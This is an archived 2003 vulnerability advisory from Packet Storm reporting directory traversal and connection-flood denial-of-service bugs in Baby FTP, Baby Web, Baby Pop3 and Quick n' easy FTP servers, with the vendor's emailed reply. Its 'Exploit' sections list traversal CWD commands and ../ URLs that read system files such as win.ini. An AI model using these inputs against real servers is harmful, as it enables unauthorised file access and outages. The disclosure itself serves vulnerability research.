what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

baby.txt

baby.txt
Posted May 29, 2003
Authored by Dr. Insane

Baby FTP server version 1.2 allows for a directory traversal attack that lets a remote attacker view any file on the system by using non-standard characters with CWD. The server will also crash if multiple connections from the same host occur.

tags | exploit, remote
SHA-256 | f2693ad95d364c41a545acb6d6743c838069082815811187534c4de54b7b073d

baby.txt

Change Mirror Download
In this advisorie there are some vulnerabilities i found yesterday for BabyFtp server,Baby web server,Baby Pop3
server and Quick n' easy Ftp.



I informed the Company about these vulnerabilities and here are the e-mails they sent me:
-----------------------------------------------------------------
From pablovandermeer@kabelfoon.nl Wed May 28 21 : 42:08 2003
Return-Path : <pablovandermeer@kabelfoon.nl>
Received : from cardassian.kabelfoon.nl (cardassian.kabelfoon.nl [62.45.45.18]) by localhost.localdomain (8.12.8/8.12.8) with ESMTP id h4SIg6KH025510 for <dr_insane@pathfinder.gr>; Wed, 28 May 2003 21:42:07 +0300
Received : from PABLO (kf-nawij-tg01-0881.dial.kabelfoon.nl [62.45.131.114]) by cardassian.kabelfoon.nl (Postfix) with SMTP id EFAF8BE9F0 for <dr_insane@pathfinder.gr>; Wed, 28 May 2003 20:39:21 +0200 (CEST)
Message-ID : <000f01c32548$73cf3be0$0100a8c0@PABLO>
From : "Pablo" <pablovandermeer@kabelfoon.nl>
To : xxxxxx xxxxxxx <dr_insane@pathfinder.gr>
References : <200305281812.h4SICUvC016027@localhost.localdomain>
ÈÝìá : Re: Multiple Vulnerabilities Found :)
Date : Wed, 28 May 2003 20:39:20 +0200
MIME-Version : 1.0
Content-Type : text/plain; charset="iso-8859-7"
Content-Transfer-Encoding : 8bit
X-Priority : 3
X-MSMail-Priority : Normal
X-Mailer : Microsoft Outlook Express 6.00.2800.1106
Disposition-Notification-To : "Pablo" <pablovandermeer@kabelfoon.nl>
X-MimeOLE : Produced By Microsoft MimeOLE V6.00.2800.1106

Hi,

Thanks you very much for your report.
First let me say that BabyFtp server, Baby web server, Baby Pop3 server are
NOT real products but just (MFC) sample applications!
They contain even more bugs than you can think of...
As for Quick 'n Easy FTP server: can you make more connections than
configured in 'Max connections' settings?
If so how did you manage to do that?

Regards,
Pablo


Ok, thanks!
It looks like this is related to the size of physical memory, when new
sockets are created in virtual memory it will crash the application... :(
I will take a look at it first thing tomorrow morning.

Regards and keep on hacking...
Pablo




------------------------------------------
Baby FTP 1.2 Multiple Vulnerabilities.
-------------------------------------------

Release Date:
MAY 28, 2003

Systems Affected:
BAby Ftp server Version 1.2


Description:
While i was testing Baby Ftp Server last night i found some vulnerabilities. Let's take a look at the following:

1)The ftp server is vulnerable to directory traversal attack. A remote user can see the whole hard disk
by supplying some strange cwd commands.

2)There is also a DOS attack.if you try to establish multiple connections from the same host on baby Ftp server it will crash.


Let's Dance (Exploit)
--------------------
(1)
You need to supply these CWD commands for a succesful attack:

CWD ...
CWD /...
CWD /......
CWD \...
CWD ...\
CWD .../

(2)
Let's try to establish about 100 connections with the webserver from the same IP:

1 220 Welcome to Baby Ftp server
2 220 Welcome to Baby Ftp server
3 220 Welcome to Baby Ftp server
.
.
.
.
67 220 Welcome to Baby Ftp server

b00m..crash:>

The error message will be: "Unhanled exception(MFC42.DLL):0xC00000005:Access Violation




^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Quick n' easy FTP server 1.7 DOS ATTACK
---------------------------------------


Systems Affected:
Quick n' easy FTP server 1.7

Description:
------------
There is one D0s attack (yes again!) in Quick n' easy FTP server 1.7. By making a big numer of connections you can crash the
server:>

Exploit:
--------
The same as above...try to establish a big number of connections using the same Ip and the server will crash.


BABY web server 1.5 Multiple bugs
---------------------------------------

Systems Affected:
BAby Web server 1.5


Description:
------------
While i was checking Baby web server version 1.5 i found some stupid bugs.The first is a directory traversal bug and the second
a Dos attack.Let's find out what is going on!

Exploit:
--------
(1)You can read whatever you want on the remote server by supplying some /.././ on you Web browser:

https://[server]/../../../../windows/win.ini
https://[server]\..\..\..\windows/win.ini

etc..etc..etc...

(2)

By supplying again a very big number of connections the web server will crash:) It seems that all the products of
www.pablovandermeer.nl have the same problem.


BABY Pop3 server Version 1.0 DOS attack
---------------------------------------
Systems Affected:
BABY Pop3 server version 1.0

Description:
------------
There is the same Dos vulnerability here:P You can crash the server by supplying multiple connections from the same host.






-----------------------------------------------
vulnerabilities found and tested by dr_insane
-----------------------------------------------


Feedback
---------

Please send suggestions and Comments to:

dr_insane@hack.gr
https://members.lycos.co.uk/r34ct/






Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close